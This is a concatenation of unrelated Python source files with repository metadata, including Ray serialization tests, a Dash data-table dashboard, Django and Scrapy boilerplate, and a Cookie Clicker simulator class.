# target = targets[ii]
# plt.suptitle('Same!' if target == 1 else 'Different!')
# plt.subplot(1, 2, 1)
# print('input1 shape:', np.shape(inputs[0][ii, :, :, :]))
# plt.imshow(np.reshape(inputs[0][ii, :, :, :], (150, 100)), cmap='gray')
# plt.subplot(1, 2, 2)
# plt.imshow(np.reshape(inputs[1][ii, :, :, :], (150, 100)), cmap='gray')
# plt.show()
loss = siamese_net.train_on_batch(inputs, targets)
print('## i:', i, 'loss:', loss)
# if i % evaluate_every == 0:
# val_acc = loader.test_oneshot(siamese_net, N_way, n_val, verbose=True)
# print('## val_acc:', val_acc)
# if val_acc >= best:
# print("saving")
# # siamese_net.save('PATH')
# best = val_acc
#
# if i % loss_every == 0:
# print("iteration {}, training loss: {:.2f}, ".format(i, loss)) | [
"[email protected]"
] | |
0249279d73b9c2701e375e170c9ea5283effc2a2 | 0953f9aa0606c2dfb17cb61b84a4de99b8af6d2c | /python/ray/tests/test_serialization.py | df5bcb8533273289b581ac3fbfe06276f43f2e69 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | oscarknagg/ray | da3dc03e24945ff4d5718fd35fc1b3408d8907eb | 20d47873c9e8f5bbb80fe36e5d16256c337c4db3 | refs/heads/master | 2023-09-01T01:45:26.364731 | 2021-10-21T07:46:52 | 2021-10-21T07:46:52 | 382,402,491 | 2 | 1 | Apache-2.0 | 2021-09-15T12:34:41 | 2021-07-02T16:25:05 | Python | UTF-8 | Python | false | false | 18,436 | py | # coding: utf-8
import collections
import io
import logging
import re
import string
import sys
import weakref
import numpy as np
from numpy import log
import pytest
import ray
import ray.cluster_utils
logger = logging.getLogger(__name__)
def is_named_tuple(cls):
"""Return True if cls is a namedtuple and False otherwise."""
b = cls.__bases__
if len(b) != 1 or b[0] != tuple:
return False
f = getattr(cls, "_fields", None)
if not isinstance(f, tuple):
return False
return all(type(n) == str for n in f)
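# e.g. is_named_tuple(collections.namedtuple("P", "x y")) is True, while
# is_named_tuple(tuple) and is_named_tuple(dict) are False.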
@pytest.mark.parametrize(
"ray_start_regular", [{
"local_mode": True
}, {
"local_mode": False
}],
indirect=True)
def test_simple_serialization(ray_start_regular):
primitive_objects = [
# Various primitive types.
0,
0.0,
0.9,
1 << 62,
1 << 999,
b"",
b"a",
"a",
string.printable,
"\u262F",
u"hello world",
u"\xff\xfe\x9c\x001\x000\x00",
None,
True,
False,
[],
(),
{},
type,
int,
set(),
# Collections types.
collections.Counter([np.random.randint(0, 10) for _ in range(100)]),
collections.OrderedDict([("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: [], [("hello", 1), ("world", 2)]),
collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
# Numpy dtypes.
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
]
composite_objects = (
[[obj]
for obj in primitive_objects] + [(obj, )
for obj in primitive_objects] + [{
(): obj
} for obj in primitive_objects])
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in primitive_objects + composite_objects:
new_obj_1 = ray.get(f.remote(obj))
new_obj_2 = ray.get(ray.put(obj))
assert obj == new_obj_1
assert obj == new_obj_2
# TODO(rkn): The numpy dtypes currently come back as regular integers
# or floats.
if type(obj).__module__ != "numpy":
assert type(obj) == type(new_obj_1)
assert type(obj) == type(new_obj_2)
@pytest.mark.parametrize(
"ray_start_regular", [{
"local_mode": True
}, {
"local_mode": False
}],
indirect=True)
def test_complex_serialization(ray_start_regular):
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently
# np.testing.assert_equal fails because we do not properly
# handle different numerical types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), (
"Objects {} and {} are different.".format(obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (is_named_tuple(type(obj1)) or is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), (
"Objects {} and {} are named "
"tuples with different lengths.".format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world",
u"\xff\xfe\x9c\x001\x000\x00", None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{
"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)
},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
},
]
class Foo:
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar:
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz:
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux:
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = collections.namedtuple("Point", ["x", "y"])
NamedTupleExample = collections.namedtuple(
"Example", "field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
]
# Test dataclasses in Python 3.7.
if sys.version_info >= (3, 7):
from dataclasses import make_dataclass
DataClass0 = make_dataclass("DataClass0", [("number", int)])
CUSTOM_OBJECTS.append(DataClass0(number=3))
class CustomClass:
def __init__(self, value):
self.value = value
DataClass1 = make_dataclass("DataClass1", [("custom", CustomClass)])
class DataClass2(DataClass1):
@classmethod
def from_custom(cls, data):
custom = CustomClass(data)
return cls(custom)
def __reduce__(self):
return (self.from_custom, (self.custom.value, ))
CUSTOM_OBJECTS.append(DataClass2(custom=CustomClass(43)))
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = ([{
obj: obj
} for obj in PRIMITIVE_OBJECTS if (
obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = (
BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS)
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
assert_equal(obj, ray.get(ray.put(obj)))
# Test StringIO serialization
s = io.StringIO(u"Hello, world!\n")
s.seek(0)
line = s.readline()
s.seek(0)
assert ray.get(ray.put(s)).readline() == line
def test_numpy_serialization(ray_start_regular):
array = np.zeros(314)
from ray.cloudpickle import dumps
buffers = []
inband = dumps(array, protocol=5, buffer_callback=buffers.append)
assert len(inband) < array.nbytes
assert len(buffers) == 1
def test_numpy_subclass_serialization_pickle(ray_start_regular):
class MyNumpyConstant(np.ndarray):
def __init__(self, value):
super().__init__()
self.constant = value
def __str__(self):
print(self.constant)
constant = MyNumpyConstant(123)
repr_orig = repr(constant)
repr_ser = repr(ray.get(ray.put(constant)))
assert repr_orig == repr_ser
def test_inspect_serialization(enable_pickle_debug):
import threading
from ray.cloudpickle import dumps_debug
lock = threading.Lock()
with pytest.raises(TypeError):
dumps_debug(lock)
def test_func():
print(lock)
with pytest.raises(TypeError):
dumps_debug(test_func)
class test_class:
def test(self):
self.lock = lock
from ray.util.check_serialize import inspect_serializability
results = inspect_serializability(lock)
assert list(results[1])[0].obj == lock, results
results = inspect_serializability(test_func)
assert list(results[1])[0].obj == lock, results
results = inspect_serializability(test_class)
assert list(results[1])[0].obj == lock, results
@pytest.mark.parametrize(
"ray_start_regular", [{
"local_mode": True
}, {
"local_mode": False
}],
indirect=True)
def test_serialization_final_fallback(ray_start_regular):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(ray_start_2_cpus):
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass:
pass
ray.get(ray.put(TempClass()))
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
class Foo:
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
class TempClass1:
def __init__(self):
self.value = 1
# Test returning custom classes created on workers.
@ray.remote
def g():
class TempClass2:
def __init__(self):
self.value = 2
return TempClass1(), TempClass2()
object_1, object_2 = ray.get(g.remote())
assert object_1.value == 1
assert object_2.value == 2
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass:
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_returns=3)
def j():
class Class0:
def method0(self):
pass
c0 = Class0()
class Class0:
def method1(self):
pass
c1 = Class0()
class Class0:
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0:
def method0(self):
pass
c0 = Class0()
class Class0:
def method1(self):
pass
c1 = Class0()
class Class0:
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_deserialized_from_buffer_immutable(ray_start_shared_local_modes):
x = np.full((2, 2), 1.)
o = ray.put(x)
y = ray.get(o)
with pytest.raises(
ValueError, match="assignment destination is read-only"):
y[0, 0] = 9.
def test_reducer_override_no_reference_cycle(ray_start_shared_local_modes):
# bpo-39492: reducer_override used to induce a spurious reference cycle
# inside the Pickler object, that could prevent all serialized objects
# from being garbage-collected without explicity invoking gc.collect.
# test a dynamic function
def f():
return 4669201609102990671853203821578
wr = weakref.ref(f)
bio = io.BytesIO()
from ray.cloudpickle import CloudPickler, loads, dumps
p = CloudPickler(bio, protocol=5)
p.dump(f)
new_f = loads(bio.getvalue())
assert new_f() == 4669201609102990671853203821578
del p
del f
assert wr() is None
# test a dynamic class
class ShortlivedObject:
def __del__(self):
print("Went out of scope!")
obj = ShortlivedObject()
new_obj = weakref.ref(obj)
dumps(obj)
del obj
assert new_obj() is None
def test_buffer_alignment(ray_start_shared_local_modes):
# Deserialized large numpy arrays should be 64-byte aligned.
x = np.random.normal(size=(10, 20, 30))
y = ray.get(ray.put(x))
assert y.ctypes.data % 64 == 0
# Unlike PyArrow, Ray aligns small numpy arrays to 8
# bytes to be memory efficient.
xs = [np.random.normal(size=i) for i in range(100)]
ys = ray.get(ray.put(xs))
for y in ys:
assert y.ctypes.data % 8 == 0
xs = [np.random.normal(size=i * (1, )) for i in range(20)]
ys = ray.get(ray.put(xs))
for y in ys:
assert y.ctypes.data % 8 == 0
xs = [np.random.normal(size=i * (5, )) for i in range(1, 8)]
xs = [xs[i][(i + 1) * (slice(1, 3), )] for i in range(len(xs))]
ys = ray.get(ray.put(xs))
for y in ys:
assert y.ctypes.data % 8 == 0
def test_custom_serializer(ray_start_shared_local_modes):
import threading
class A:
def __init__(self, x):
self.x = x
self.lock = threading.Lock()
def custom_serializer(a):
return a.x
def custom_deserializer(x):
return A(x)
ray.util.register_serializer(
A, serializer=custom_serializer, deserializer=custom_deserializer)
ray.get(ray.put(A(1)))
ray.util.deregister_serializer(A)
with pytest.raises(Exception):
ray.get(ray.put(A(1)))
# deregister again takes no effects
ray.util.deregister_serializer(A)
def test_numpy_ufunc(ray_start_shared_local_modes):
@ray.remote
def f():
# add reference to the numpy ufunc
log
ray.get(f.remote())
class _SelfDereferenceObject:
"""A object that dereferences itself during deserialization"""
def __init__(self, ref: ray.ObjectRef):
self.ref = ref
def __reduce__(self):
return ray.get, (self.ref, )
def test_recursive_resolve(ray_start_shared_local_modes):
ref = ray.put(42)
for _ in range(10):
ref = ray.put(_SelfDereferenceObject(ref))
assert ray.get(ref) == 42
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
| [
"[email protected]"
] | |
87ee7c0dbbc0a3f5eb8ebfa7b0a3b4f8f8b4319b | b4824a127a50c617c90defa835161bfc9cd2faf3 | /other_Pro/dashboard_dark_theme.py | fbc4ef6804193aba61d5440fdc7a24e84175ec1b | [] | no_license | hj1996/cyse | 77a616939c880e6b8c5cf89b6dbbd4afcdf7eddc | 14ebbe37ec677f47c2cf07cbcb5293fc8b9c8791 | refs/heads/master | 2020-04-18T16:18:50.873180 | 2019-03-28T22:35:12 | 2019-03-28T22:35:12 | 167,631,085 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,837 | py | import os
import glob
import re
import json
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import pandas as pd
import plotly.graph_objs as go
import dash_table
import dash_daq as daq
app = dash.Dash(__name__)
def file_opener():
df = pd.read_csv("internettrafficreport-namerica--.csv")
return df
PAGE_SIZE = 5
df=file_opener()
app.layout = html.Div(id='dark-theme-provider-demo', children=[
    dash_table.DataTable(
        id='table-sorting-filtering',
        columns=[
            {'name': i, 'id': i, 'deletable': True} for i in sorted(df.columns)
        ],
        pagination_settings={
            'current_page': 0,
            'page_size': PAGE_SIZE
        },
        pagination_mode='be',
        filtering='be',
        filtering_settings='',
        sorting='be',
        sorting_type='multi',
        sorting_settings=[]
    ),
    html.Br(),
    daq.ToggleSwitch(
        id='daq-light-dark-theme',
        label=['Light', 'Dark'],
        style={'width': '250px', 'margin': 'auto'},
        value=False
    )
])
@app.callback(
    Output('table-sorting-filtering', 'data'),
    [Input('table-sorting-filtering', 'pagination_settings'),
     Input('table-sorting-filtering', 'sorting_settings'),
     Input('table-sorting-filtering', 'filtering_settings')]
)
def update_graph(pagination_settings, sorting_settings, filtering_settings):
filtering_expressions = filtering_settings.split(' && ')
dff = df
for filter in filtering_expressions:
if ' eq ' in filter:
col_name = filter.split(' eq ')[0]
filter_value = filter.split(' eq ')[1]
dff = dff.loc[dff[col_name] == filter_value]
if ' > ' in filter:
col_name = filter.split(' > ')[0]
filter_value = float(filter.split(' > ')[1])
dff = dff.loc[dff[col_name] > filter_value]
if ' < ' in filter:
col_name = filter.split(' < ')[0]
filter_value = float(filter.split(' < ')[1])
dff = dff.loc[dff[col_name] < filter_value]
if len(sorting_settings):
dff = dff.sort_values(
[col['column_id'] for col in sorting_settings],
ascending=[
col['direction'] == 'asc'
for col in sorting_settings
],
inplace=False
)
return dff.iloc[
pagination_settings['current_page']*pagination_settings['page_size']:
(pagination_settings['current_page'] + 1)*pagination_settings['page_size']
].to_dict('rows')
@app.callback(
    Output('dark-theme-provider-demo', 'style'),
    [Input('daq-light-dark-theme', 'value')]
)
def change_bg(dark_theme):
if(dark_theme):
return {'background-color': '#303030', 'color': 'white'}
else:
return {'background-color': 'white', 'color': 'black'}
if __name__ == '__main__':
app.run_server(debug=True)
| [
"[email protected]"
] | |
c28f9064b7f66336abca56572c1f38ac8d1c8854 | b919a85a069299fbf119507eaae3859eac6dd62e | /xunit.py | ed527ebe4017a3ed0412c21a91e28182d9511509 | [] | no_license | nedbat/xunit_tools | f3c3b1f4647baac0b00c15ce65713cfb4f2f6209 | faba9f72dfc3b583f8b6dd4aedf320ffac9ac5e6 | refs/heads/master | 2023-06-22T04:25:10.299933 | 2015-10-26T21:12:17 | 2015-10-26T21:12:17 | 44,988,467 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,475 | py | """Python classes to help with xunit.xml structure."""
from lxml import etree
class Summable(object):
"""An object whose attributes can be added together easily.
Subclass this and define `fields` on your derived class.
"""
def __init__(self):
for name in self.fields:
setattr(self, name, 0)
@classmethod
def from_element(cls, element):
"""Construct a Summable from an xml element with the same attributes."""
self = cls()
for name in self.fields:
try:
setattr(self, name, int(element.get(name, "0")))
except Exception as ex:
raise ValueError("Couldn't read attribute %r from %.300s: %s" % (name, etree.tostring(element), ex))
return self
def onto_element(self, element):
"""Write the fields as attributes onto an xml element."""
for name in self.fields:
element.set(name, str(getattr(self, name)))
def __add__(self, other):
result = type(self)()
for name in self.fields:
setattr(result, name, getattr(self, name) + getattr(other, name))
return result
class TestResults(Summable):
"""A test result, makeable from a nosetests.xml <testsuite> element."""
fields = ["errors", "failures", "skip", "tests"]
def __str__(self):
msg = "{0.tests:4d} tests, {0.errors} errors, {0.failures} failures, {0.skip} skipped"
return msg.format(self)
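# Illustrative usage sketch (an addition, not from the original module): parse
# two <testsuite> elements and sum their counters; the attribute values below
# are hypothetical examples.
if __name__ == "__main__":
    a = TestResults.from_element(
        etree.fromstring('<testsuite errors="1" failures="0" skip="2" tests="10"/>'))
    b = TestResults.from_element(
        etree.fromstring('<testsuite errors="0" failures="1" skip="0" tests="5"/>'))
    print(a + b)  # ->   15 tests, 1 errors, 1 failures, 2 skipped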
| [
"[email protected]"
] | |
cb35a3d9d03fa30719c1c8f6bf01cf31f92a9fee | 6375f82cf4f760f4919c68beaac924afd5370c07 | /python/Activity13.py | ae6be1ad7552bf36b922c5f161cf607e3d8c5c0e | [] | no_license | mounika2583/sdet | 18af64dedf64926305c8210daedf9ddc7fa84224 | 938b56e9100c1300325d102de983b5952a58eb91 | refs/heads/main | 2023-03-17T04:38:13.147570 | 2021-03-04T17:21:55 | 2021-03-04T17:21:55 | 326,884,511 | 0 | 0 | null | 2021-01-05T04:20:34 | 2021-01-05T04:20:33 | null | UTF-8 | Python | false | false | 198 | py | list1=[5,25,76,13,50]
def list_sum(n):
    total = 0
    for num in n:
        total = total + num
    return total
result = list_sum(list1)
print("The sum of all the elements is: " + str(result))
| [
"[email protected]"
] | |
1e9f246a71cab4edcf307250ab7f70937357d124 | ec1bd713b3631c6a7d41eecf57eef5979a6d4f4a | /krlbook/profiles/migrations/0002_relationship.py | 9dec92bb17bc1b109689f115b506d89d9021b47d | [] | no_license | cntrkilril/krlbook | e6c1a452a96f8dd7fa6ab6ec7c144e0f3a3e5a7c | 5ff142622ca7f2e3929d70b932c1273f76e6fddb | refs/heads/master | 2023-06-15T17:19:12.345739 | 2021-07-10T11:30:57 | 2021-07-10T11:30:57 | 381,473,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | # Generated by Django 3.2.4 on 2021-06-09 15:25
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('profiles', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Relationship',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(choices=[('send', 'send'), ('accepted', 'accepted')], max_length=8)),
('updated', models.DateTimeField(auto_now=True)),
('created', models.DateTimeField(auto_now_add=True)),
('receiver', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='receiver', to='profiles.profile')),
('sender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sender', to='profiles.profile')),
],
),
]
| [
"[email protected]"
] | |
be5d6241a7a447176cec2f980c304d72c8afcc7c | 6d9dacc72c57ea411794cf3b27a2862abf84d714 | /桌酷壁纸略缩图urllib库版/bizhi/middlewares.py | 7518e847fe99701e031159dd353b15255c6dce03 | [] | no_license | yzr0011/python-Scrapy- | 26a863e691c3601b539d7c548fb69a82d2279d06 | 9dc73a89897ef6680fa119eb01bfcd054ccd0474 | refs/heads/master | 2020-04-26T18:02:00.363389 | 2019-03-08T05:08:07 | 2019-03-08T05:08:07 | 173,732,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,595 | py | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
class BizhiSpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Response, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class BizhiDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
| [
"[email protected]"
] | |
bb724691a0396055e90f7b292abcda68fa16e597 | ee3e0a69093e82deff1bddf607f6ce0dde372c48 | /BOJ/random/BOJ_10808.py | 278786f83e00b57301f1cf5d8af039d5c2a68046 | [] | no_license | cndqjacndqja/algorithm_python | 202f9990ea367629aecdd14304201eb6fa2aa37e | 843269cdf8fb9d4c215c92a97fc2d007a8f96699 | refs/heads/master | 2023-06-24T08:12:29.639424 | 2021-07-24T05:08:46 | 2021-07-24T05:08:46 | 255,552,956 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | from string import ascii_lowercase
if __name__ == "__main__":
    letters = list(ascii_lowercase)
    word = input()
    # BOJ 10808: count how often each lowercase letter occurs in the word
    result = [0] * 26
    for i in range(len(word)):
        for j in range(len(letters)):
            if word[i] == letters[j]:
                result[j] += 1
    print(*result) | [
"[email protected]"
] | |
817a382bdedb15f313bab3fe927c12c111637878 | 5edf699320f5e247cbcf9cbb3bc8dffb03d984e4 | /CL_2-1/main.py | e278628175ab6aad5c35f812075ae06ee2b69909 | [] | no_license | Livenai/LambTorch | 57c8d044803b221995d03f4220354a66161a7364 | a815a433deb89dfc75f5b27fe0e4ad4c20b520da | refs/heads/main | 2023-08-02T21:58:48.496148 | 2021-10-04T12:02:17 | 2021-10-04T12:02:17 | 341,551,821 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 591 | py | import contest
import telegram_debugger
from telegram_debugger import sendMSG
import traceback
# PARAMETERS
NUM_NETWORKS = 50
try:
    # Opening message
    contest.sendStarMSG()
    # Generate the tasks
    #contest.generateTasks(NUM_NETWORKS)
    # Start training the remaining tasks
    contest.trainRemainingTasks()
    # Show the ranking
    contest.showRanking()
    # Final message
    contest.sendFinalMSG()
except Exception as e:
    # Send the error to the admin
    sendMSG("ERROR", is_error=True)
    sendMSG(traceback.format_exc(), is_error=True)
| [
"[email protected]"
] | |
5257783dbc07aa9fe08331b13d3c15a6db9fa904 | e1a0b03b213a08cc7ebe5776a9127a72341ea773 | /chapter_2_examples/standalone_files/parts_of_speech.py | 844bce0e175fa8cf214813db82649cc3ad56946b | [] | no_license | kobohuong/data_wrangling_exercises-1 | 9834107ca4b017af0b4afa704cbcdff2d8764c59 | fde4b2031f2ca5c52f159beb4ba8e5c2f2e6fab1 | refs/heads/main | 2023-07-07T19:04:17.110640 | 2021-08-09T02:15:03 | 2021-08-09T02:15:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | # A number is just digits
25
# A string is anything surrounded by matching quotation marks
"Hello World"
# A list is surrounded by square brackets, with commas between items
["this","is",1,"list"]
# An object is a set of key:value pairs, separated by commas and surrounded
# by curly braces
{"title":"Practical Python for Data Wrangling and Data Quality",
"format": "book",
"author": "Susan E. McGregor"
}
# A Boolean is a data type that has only two values, true and false.
True
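# You can confirm the type of any of these values with the built-in type()
# function (an illustrative addition in the spirit of the examples above)
type(25)             # <class 'int'>
type("Hello World")  # <class 'str'>
type(True)           # <class 'bool'>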
| [
"[email protected]"
] | |
d43e510e6f94bd81847ca58aaafbf9f2ead1840c | 82f230d68f4fdd286a2a742f247bc6eff98077bd | /principles_of_computing/part1/week5/clicker_sim.py | d72b0d5116ffaed35d7f1c3278633500efc2e4b9 | [] | no_license | cshintov/Courses | b2c8ddc0081c25a939c0e99e5eac7ff8c86d4a9b | 191213bd3586270aca79dcfd6a7b1f225879cac1 | refs/heads/master | 2021-01-20T02:46:56.025084 | 2015-09-11T20:11:50 | 2015-09-11T20:11:50 | 42,266,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,047 | py | """
Cookie Clicker Simulator
"""
#import simpleplot
# Used to increase the timeout, if necessary
#import codeskulptor
#codeskulptor.set_timeout(20)
import poc_clicker_provided as provided
#from poc_testsuite import *
#from poc_clicker_provided import *
#from copy import deepcopy
from math import ceil
# Constants
SIM_TIME = 10000000000.0
class ClickerState:
"""
Simple class to keep track of the game state.
"""
def __init__(self):
self._total_cookies = 0.0
self._current_cookies = 0.0
self._current_time = 0.0
self._current_cps = 1.0
self._history = [(0.0, None, 0.0, 0.0)]
def __str__(self):
"""
Return human readable state
"""
state = ""
total = "{:20}".format(self._total_cookies)
state += "Total Cookies Produced: " + total + "\n"
cookies = "{:20f}".format(self._current_cookies)
state += "Cookies in bank: " + str(cookies) + "\n"
state += "Time Elapsed: " + str(self._current_time) + "\n"
state += "Current CPS: " + str(self._current_cps) + "\n"
return state
def get_cookies(self):
"""
Return current number of cookies
(not total number of cookies)
Should return a float
"""
return self._current_cookies
def get_cps(self):
"""
Get current CPS
Should return a float
"""
return self._current_cps
def get_time(self):
"""
Get current time
Should return a float
"""
return self._current_time
def get_history(self):
"""
Return history list
History list should be a list of tuples of the form:
(time, item, cost of item, total cookies)
For example: [(0.0, None, 0.0, 0.0)]
Should return a copy of any internal data structures,
so that they will not be modified outside of the class.
"""
return self._history
